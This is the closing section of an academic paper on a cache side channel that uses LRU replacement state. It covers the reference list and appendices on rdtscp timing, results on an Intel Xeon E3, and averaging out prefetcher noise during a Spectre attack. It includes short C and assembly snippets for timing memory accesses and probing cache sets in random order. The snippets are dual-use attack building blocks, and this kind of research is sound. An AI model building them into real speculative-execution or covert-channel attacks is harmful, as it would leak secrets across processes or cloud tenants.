  • [32] M. Yan, J. Choi, D. Skarlatos, A. Morrison, C. Fletcher, and J. Torrellas, “InvisiSpec: Making Speculative Execution Invisible in the Cache Hierarchy,” in 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO).   IEEE, 2018.
  • [33] K. N. Khasawneh, E. M. Koruyeh, C. Song, D. Evtyushkin, D. Ponomarev, and N. Abu-Ghazaleh, “Safespec: Banishing the spectre of a meltdown with leakage-free speculation,” arXiv preprint arXiv:1806.05179, 2018.
  • [34] A. Jaleel, K. B. Theobald, S. C. Steely Jr, and J. Emer, “High performance cache replacement using re-reference interval prediction (rrip),” in ACM SIGARCH Computer Architecture News, vol. 38, no. 3.   ACM, 2010.
  • [35] T. Ristenpart, E. Tromer, H. Shacham, and S. Savage, “Hey, you, get off of my cloud: exploring information leakage in third-party compute clouds,” in Proceedings of the 16th ACM conference on Computer and communications security.   ACM, 2009.
  • [36] Y. Zhang, A. Juels, M. K. Reiter, and T. Ristenpart, “Cross-tenant side-channel attacks in PaaS clouds,” in Proceedings of the 2014 ACM SIGSAC Conference on Computer and Communications Security.   ACM, 2014.
  • [37] E. M. Koruyeh, K. N. Khasawneh, C. Song, and N. Abu-Ghazaleh, “Spectre returns! speculation attacks using the return stack buffer,” in 12th USENIX Workshop on Offensive Technologies (WOOT 18), 2018.
  • [38] G. Maisuradze and C. Rossow, “ret2spec: Speculative execution using return stack buffers,” in Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security.   ACM, 2018.
  • [39] S. Briongos, P. Malagón, J. M. Moya, and T. Eisenbarth, “Reload+Refresh: Abusing cache replacement policies to perform stealthy cache attacks,” arXiv preprint arXiv:1904.06278, 2019.
  • [40] G. Navarro, “A guided tour to approximate string matching,” ACM computing surveys (CSUR), vol. 33, 2001.
  • [41] Software Optimization Guide for AMD Family 17h Processors, https://developer.amd.com/wordpress/media/2013/12/55723_SOG_Fam_17h_Processors_3.00.pdf accessed Feb. 2019.
  • [42] T. Zhang, Y. Zhang, and R. B. Lee, “Cloudradar: A real-time side-channel attack detection system in clouds,” in International Symposium on Research in Attacks, Intrusions, and Defenses.   Springer, 2016.
  • [43] M. Chiappetta, E. Savas, and C. Yilmaz, “Real time detection of cache-based side-channel attacks using hardware performance counters,” Applied Soft Computing, vol. 49, 2016.
  • [44] M. Alam, S. Bhattacharya, D. Mukhopadhyay, and S. Bhattacharya, “Performance counters to rescue: A machine learning based safeguard against micro-architectural side-channel-attacks,” IACR Cryptology ePrint Archive, vol. 2017, 2017.
  • [45] N. Binkert, B. Beckmann, G. Black, S. K. Reinhardt, A. Saidi, A. Basu, J. Hestness, D. R. Hower, T. Krishna, S. Sardashti et al., “The GEM5 simulator,” ACM SIGARCH Computer Architecture News, vol. 39, 2011.
  • [46] J. L. Henning, “Spec cpu2006 benchmark descriptions,” ACM SIGARCH Computer Architecture News, vol. 34, 2006.
  • [47] V. Costan, I. Lebedev, and S. Devadas, “Sanctum: Minimal hardware extensions for strong software isolation,” in 25th USENIX Security Symposium (USENIX Security 16), 2016.
  • [48] M. K. Qureshi, “Ceaser: Mitigating conflict-based cache attacks via encrypted-address and remapping,” in 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO).   IEEE, 2018.
  • [49] C. Trippel, D. Lustig, and M. Martonosi, “MeltdownPrime and SpectrePrime: Automatically-Synthesized Attacks Exploiting Invalidation-Based Coherence Protocols,” arXiv preprint arXiv:1802.03802, 2018.

Appendix A Measuring time with rdtscp

Figure 12 shows the code to measure the time of a single memory access using the rdtscp instruction. Figure 13 shows the measurement results using the code in Figure 12 when the data is in different cache levels. As shown in Figure 13, the measurement results for an L1 hit and an L1 miss (L2 hit) completely overlap and have the same distribution. Thus, simply measuring a single memory access cannot distinguish the timing difference between an L1 hit and an L1 miss. Replacing the rdtscp instruction with the lfence and rdtsc instructions gives the same result. Hence, we use the pointer chasing approach discussed in the paper; a minimal sketch of this approach is shown after Figure 13.

rdtscp                    # read timestamp counter; low 32 bits in %eax
movl %eax, %esi           # save the start timestamp
movq (%rbx), %rax         # memory access being measured
rdtscp                    # read timestamp counter again
subl %esi, %eax           # %eax = end - start (elapsed cycles)
Fig. 12: Code to measure the latency of a single access.
Fig. 13: Histogram of access latencies of a single L1 hit and L1 miss (L2 hit), measured with the code in Figure 12, (left) on Intel Xeon E5-2690 and (right) on AMD EPYC 7571.
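
For comparison, the following is a minimal sketch of the pointer chasing measurement (the node layout, CHAIN_LEN, and the use of the __rdtscp intrinsic are illustrative assumptions; the exact element placement used in the attack is described in Section IV-D). The loads form a dependency chain, so each load must wait for the previous one and the small per-access latency differences accumulate into a reliably measurable total.

#include <stdint.h>
#include <x86intrin.h>   /* __rdtscp */

#define CHAIN_LEN 7      /* number of dependent elements in the chain */

/* One element per cache line: a next pointer plus padding to 64 bytes. */
typedef struct node {
    struct node *next;
    char pad[64 - sizeof(struct node *)];
} node_t;

/* Time CHAIN_LEN dependent loads; latency differences add up instead of
 * being hidden by out-of-order execution. */
uint64_t time_chain(node_t *head) {
    unsigned aux;
    uint64_t start = __rdtscp(&aux);
    node_t *p = head;
    for (int i = 0; i < CHAIN_LEN; i++)
        p = p->next;
    asm volatile("" :: "r"(p));   /* keep the chain from being optimized away */
    uint64_t end = __rdtscp(&aux);
    return end - start;
}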

Appendix B Results on Intel Xeon E3-1245 v5

Figure 14 shows the traces observed by the receiver in hyper-threaded sharing on Intel Xeon E3-1245 v5 using Algorithm 1 (top) and Algorithm 2 (bottom). The experimental setting is the same as in Figure 5. Figure 15 shows the percentage of 1’s observed by the receiver using Algorithm 1 in time-sliced sharing with the same setting as in Figure 6. The results are similar to those on the Intel Xeon E5-2690 and show that the attack applies to multiple platforms.

Fig. 14: Example sequences of the receiver’s observations when the sender alternately sends 0 and 1 using (top) Algorithm 1 and (bottom) Algorithm 2 (parameters as in Figure 5) on Intel Xeon E3-1245 v5, with a transmission rate of 580Kbps.
Fig. 15: Percentage of 1’s observed by the receiver on Intel Xeon E3-1245 v5, when the sender is sending (left) 0 and (right) 1 using Algorithm 1 under time-sliced sharing.

Appendix C Dealing with Noise from Cache Prefetchers

During the Spectre attack, a series of memory accesses is triggered, and the cache prefetchers are also activated and can prefetch cache lines into the L1 cache, which changes the LRU states. This introduces considerable noise. To deal with the noise from the prefetchers, our strategy is to launch the attack in multiple rounds. In each round, the cache sets are accessed in a different random order (using a random number generator with a different seed per round). When processing the results, the average over all rounds is taken. Because each round uses a different random seed, the prefetcher prefetches different cache lines in each round, and the noise should average out. A minimal sketch of this strategy follows.
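
The sketch below assumes a hypothetical probe_set() routine that returns the receiver’s latency measurement for one cache set; NUM_SETS and ROUNDS are illustrative values.

#include <stdint.h>
#include <stdlib.h>

#define NUM_SETS 63    /* cache sets used to encode the secret */
#define ROUNDS   100   /* illustrative number of rounds */

/* Hypothetical: probes one cache set via the LRU channel and returns the
 * measured latency. */
extern uint64_t probe_set(int set);

void probe_all_sets(double avg_latency[NUM_SETS]) {
    uint64_t sum[NUM_SETS] = {0};
    int order[NUM_SETS];

    for (int round = 0; round < ROUNDS; round++) {
        srand(round + 1);                 /* different seed for each round */
        for (int i = 0; i < NUM_SETS; i++)
            order[i] = i;
        for (int i = NUM_SETS - 1; i > 0; i--) {   /* Fisher-Yates shuffle */
            int j = rand() % (i + 1);
            int tmp = order[i]; order[i] = order[j]; order[j] = tmp;
        }
        /* Probe the sets in this round's random order; the prefetcher's
         * contribution now differs from round to round. */
        for (int i = 0; i < NUM_SETS; i++)
            sum[order[i]] += probe_set(order[i]);
    }
    for (int s = 0; s < NUM_SETS; s++)
        avg_latency[s] = (double)sum[s] / ROUNDS;
}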